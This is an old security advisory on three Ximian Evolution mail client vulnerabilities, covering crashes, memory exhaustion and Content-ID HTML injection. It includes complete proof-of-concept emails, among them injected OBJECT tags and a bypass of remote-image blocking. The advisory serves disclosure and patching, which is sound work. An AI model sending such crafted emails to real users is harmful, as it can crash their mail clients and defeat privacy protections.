20th Mar 2003 [SBWID-6077]
COMMAND
Ximian 's Evolution Multiple vulnerabilities
SYSTEMS AFFECTED
Evolution 1.2.2 and prior releases are vulnerable, partially or wholly
to the vulnerabilities in this advisory.
PROBLEM
In Core Security Technologies Advisory [CORE-20030304-01] :
http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
*Credits:*
==========
These vulnerabilities were found by Diego Kelyacoubian, Javier Kohen,
Alberto Solino, and Juan Vera from Core Security Technologies during
Bugweek 2003 (March 3-7, 2003).
We would like to thank Carlos Montero Luque at Ximian for quickly
addressing our report and coordinating the generation and public
release of patches and information regarding these vulnerabilities.
Thanks also to Jeffrey Stedfast and other members of the Evolution
development team for the followup and development of the patches to
close these vulnerabilities.
*Vulnerability Description:*
============================
Ximian Evolution is a personal and workgroup information management
solution for Linux and UNIX-based systems. The software integrates
email, calendaring, meeting scheduling, contact management, and task
lists, in one application. For more information about Ximian Evolution
visit http://www.ximian.com
Three vulnerabilities were found that could lead to various forms of
exploitation ranging from denying to users the ability to read email,
provoke system unstability, bypassing security context checks for email
content and possibly execution of arbitrary commands on vulnerable
systems.
The following security vulnerabilities were found:
[CAN-2003-0128, BID 7117]
The Evolution mailer accepts UUEncoded content and will transparently
decode it. By including a specially crafted UUE header as part of an
otherwise perfectly normal email an attacker has the ability to crash
Evolution as soon as the mail is parsed. This makes it particularly
difficult to delete this email from Evolution's GUI and prevents a user
from reading email until the malicious mail is removed from the
mailbox.
All versions of Evolution that include the function try_uudecoding in
the module mail/mail-format.c are vulnerable.
[CAN-2003-0129, BID 7118]
Having the Evolution mailer process mail content UUencoded multiple
times will cause resource starvation. The MUA will try to allocate
memory until it dies, possibly leading to system unstability. Our
example in the technical details section uses email content encoded 3
times.
[CAN-2003-0130, BID 7119]
By including a specially crafted MIME Content-ID header as part of an
image/* MIME part, it is possible to include arbitrary data, including
HTML tags, into the stream that is passed to GTKHtml for rendering.
These vulknerabilities provides multiple exploitation possibilities in
the Evolution mailer. Namely, it's possible:
a) To crash the application. The crash appears to be the result
of heap corruption, further research on this bug is required
to demostrate sucessfull exploitation to run arbitrary commands
on vulnerable systems.
b) To bypass the "Don't connect to remote hosts to fetch images"
option.
c) To execute some bonobo components and pass them arbitrary content,
included as part of the mail.
*Technical Description - Exploit/Concept Code:*
===============================================
[CAN-2003-0128, BID 7117]
The following email will reproduce this vulnerability, note that
an empty line is required before and after the UUE header line.
>From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit
begin 600
end
--=-mTDu5zdJIsixETTwCF5Y--
[CAN-2003-0129, BID 7118]
The following email will reproduce this vulnerability.
>From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=3D-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=3Dname
Content-Type: application/octet-stream; name=3Dname
Content-Transfer-Encoding: 7bit
begin 600 phase2
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20\
M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@
end
--=3D-mTDu5zdJIsixETTwCF5Y--
[CAN-2003-0130, BID 7119]
The handle_image() function, located in the module
mail/mail-format.c, lacks proper input checking. This function does
not escape HTML characters in the string returned by get_cid, which
is in turn constructed from the Content-ID MIME header included in
the MIME part.
It can be exploited several ways, for instance:
a) The Evolution mailer will crash when a MIME part's Content-ID is
referenced from two different object tags via the cid "protocol".
The following email will reproduce this vulnerability in Evolution
version 1.2.1:
>From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Content-Id: hello
Hello World!
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name1.gif
Content-Type: image/gif; name=name1.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64
--=-mTDu5zdJIsixETTwCF5Y
b) The following email bypasses the "Don't connect to remote hosts
to fetch images" option.
>From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Content-Id: apart
<img src="http://external.host.com:anyport">
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "
Content-Transfer-Encoding: base64
--=-mTDu5zdJIsixETTwCF5Y
c) It is possible to execute bonobo components to handle content
types that Evolution mailer does not handle internally (for example
audio/ulaw). The following mail uses the Content-ID bug to execute
the bonobo-audio-ulaw component (bundled by default with bonobo)
and pass it arbitrary content.
>From [email protected] Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <[email protected]>
To: [email protected]
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=-mTDu5zdJIsixETTwCF5Y
Content-Type: audio/ulaw
Content-Transfer-Encoding: 7bit
Content-Id: mysong
There she was, just walking down the street...
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr "
Content-Transfer-Encoding: base64
--=-mTDu5zdJIsixETTwCF5Y
SOLUTION
Ximian is providing Evolution 1.2.3 on [March 18/March 19]. This
release resolves all vulnerabilities in this advisory as well as other
unrelated bugs. The patched code for Evolution that resolves these
vulnerabilities is also already available in GNOME CVS.
A workaround for unpatched versions of Evolution to prevent Evolution
from crashing when viewing messages that exploit these vulnerabilities
is to go into "View"->"Message Display" and change the value to "Show
E-mail Source."
Distribution vendors who provide their own version of Evolution have
been advised of these issues as well as having been provided the
patches to fix them. They may provide updated packages for their
distributions.